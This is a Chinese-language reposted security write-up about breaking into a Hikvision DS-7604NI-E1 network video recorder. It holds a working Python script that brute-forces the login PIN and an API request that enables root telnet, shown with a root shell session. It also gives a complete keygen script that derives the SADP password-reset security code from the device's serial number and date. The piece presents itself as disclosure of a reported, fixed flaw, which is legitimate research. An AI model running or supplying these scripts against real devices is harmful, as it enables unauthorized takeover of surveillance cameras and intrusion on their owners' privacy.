海康威视400密码重置助手搜索不到摄像头 |
您所在的位置:网站首页 › hiktoolexe › 海康威视400密码重置助手搜索不到摄像头 |
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 写在前面的话 我们经常在网上看到某某通用IP摄像机被黑客利用的新闻。大多数情况下,制造商并不会强制用户设置安全密码,通常您可以使用默认密码直接登录。但有些厂商与众不同——海康威视。首次登录时使用密码是12345,但接下来会强制您更改密码。这难道可以阻止攻击者访问设备吗?然而并没有。第一次我开始测试海康威视DS-7604NI-E1 NVR的安全性时,因为我忘记了我设置的登录密码。谷歌告诉我可以使用海康威视的Search Active Devices Protocol工具,该工具除了可以扫描子网上的设备功能外,还可以选择重置设备的管理员密码。当我安装该工具并选择Forgot Password选项时,它会提示我输入一个安全密钥,但是我没有什么安全密钥。 开始 所以这对我没什么卵用——我需要另一种方法进入。我可以在80端口上访问管理面板。使用Burp Suite拦截流量,并发现当用户尝试登录时,发现当用户试图登录时,会向位于/PSIA/Custom/SelfExt/userCheck的端点发出XHR GET请求。用户名和密码包含在内。该请求将返回带有字段的XML文档,如果验证失败则返回401,如果成功则返回200。我依稀记得那个pin只能包含数字,大概是5-6位数。此外,如果您输入错误的pin太多次,也不会锁定。这为爆破提供条件。了解这些之后,我用Python中创建了一个脚本,它只是遍历一系列pin码并检查响应:from requests import get from base64 import b64encode url = 'http://192.168.1.133/PSIA/Custom/SelfExt/userCheck' for i in range(10000, 999999): atoken = b64encode(b"admin:%i" % i) auth = ("Basic %s" % atoken.decode("utf-8")) r = get(url, headers={'Authorization': auth}) if "401" not in r.text: print(f"Found pin: {i}") break 大约30秒内我找到了我的密码。 好戏才开始 然而,密码重置选项引起了我的兴趣——如何在系统上检查代码?是否可以在本地生成它?为了找到这个答案,我需要设备上的二进制文件。幸运的是,一旦拥有管理员密码,就可以轻松获得对设备的root访问权限:您只需将一个PUT请求发送到/ISAPI/System/Network/telnetd的端点,并使用以下数据: true 这将启用telnet守护程序,您可以将其连接并以root管理员身份登录。进入busybox shell:$ telnet 192.168.1.133 Trying 192.168.1.133... Connected to 192.168.1.133. Escape character is '^]'. dvrdvs login: root Password: BusyBox v1.16.1 (2014-05-19 09:41:10 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. can not change to guest! [root@dvrdvs /] # 经过一些基本的枚举尝试后,我发现当设备启动时,位于/home/hik/start.sh的脚本将执行,它向/home/app提取一些二进制文件,设置一些内容并最终执行二进制文件/home/app/hicore。考虑到它的大小,似乎正是我正在寻找的,所以我使用FTP将其上传到我的PC并运行。仅从输出结果来看,似乎这个二进制文件几乎负责所有事情:托管网络前端,后端,与SADP通信,检查密码,驱动连接的摄像头等。使用IDA打开,搜索的字符串security code,我发现Invalid security code的引用以及在0x9C0E6D对Default password of 'admin' restored的引用,这似乎是我一直在寻找:
magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i 然后将其乘以硬编码的数字1751873395,并将其格式化为字符串作为无符号long。在Python中,我们可以使用numpy来表示:from numpy import uint32 [...] secret = str(uint32(1751873395 * magic)) 最后,for循环遍历字符串中的每个字符,并使用一些硬编码偏移量和字符值生成一个新字符串。在Python中表示为:key = "" for digit in secret: digit = ord(digit) if digit < 51: key += chr(digit + 33) elif digit < 53: key += chr(digit + 62) elif digit < 55: key += chr(digit + 47) elif digit < 57: key += chr(digit + 66) else: key += chr(digit) return(key) 但是,由于字符只是使用几个偏移量生成,因此这实际上是一个替换密码,上面的块可以替换为:c = str.maketrans("012345678", "QRSqrdeyz") return secret.translate(c) 完成的keygen函数非常简短:def keygen(seed): magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i secret = str(uint32(1751873395 * magic)) c = str.maketrans("012345678", "QRSqrdeyz") return secret.translate(c) 很好,但是究竟是什么才能成为种子呢?再看一下反汇编,看起来输入是一个从内存中取出的字符串,结合设备的日期格式为:{string}{yyyy}{mm}{dd}
import sys [...] def get_serial_date(ip): try: req = get(f"http://{ip}/upnpdevicedesc.xml") except Exception as e: print(f"Unable to connect to {ip}:\n{e}") sys.exit(-1) 密钥生成器的序列号实际上没有开头,所以我们需要删除它:from re import search [...] model = search("(.*)", req.text).group(1) serial = search("(.*)", req.text).group(1) serial = serial.replace(model, "") 我们还需要重新格式化日期:from datetime import datetime [...] datef = datetime.strptime(req.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT") date = datef.strftime("%Y%m%d") return f"{serial}{date}" 我们现在可以完成脚本的其余部分:#!/usr/bin/env python3 import sys from re import search from numpy import uint32 from requests import get from datetime import datetime def keygen(seed): magic = 0 for i, char in enumerate(seed): i += 1 magic += i * ord(char) ^ i secret = str(uint32(1751873395 * magic)) c = str.maketrans("012345678", "QRSqrdeyz") return secret.translate(c) def get_serial_date(ip): try: req = get(f"http://{ip}/upnpdevicedesc.xml") except Exception as e: print(f"Unable to connect to {ip}:\n{e}") sys.exit(-1) model = search("(.*)", req.text).group(1) serial = search("(.*)", req.text).group(1) serial = serial.replace(model, "") datef = datetime.strptime(req.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT") date = datef.strftime("%Y%m%d") return f"{serial}{date}" if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} ") print("Connects to a Hikvision device and generates a security key") sys.exit(1) seed = get_serial_date(sys.argv[1]) print(f"Got seed: {seed}") key = keygen(seed) print(f"Generated security key: {key}") 运行此命令会生成一个密钥,当输入SADP时,确实会将密码重置为12345。 最后的话 总而言之,这种安全措施是行不通的。更糟糕的是,它可能会产生一种假的安全感,而这种安全感可能会被攻击者滥用,从而无法正常工作。虽然我的脚本不允许您重置其他人的密码,因为您必须在本地摄像机的SADP中手动输入密码。 *参考来源:neonsea,周大涛编译,转载请注明来自FreeBuf.COM |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |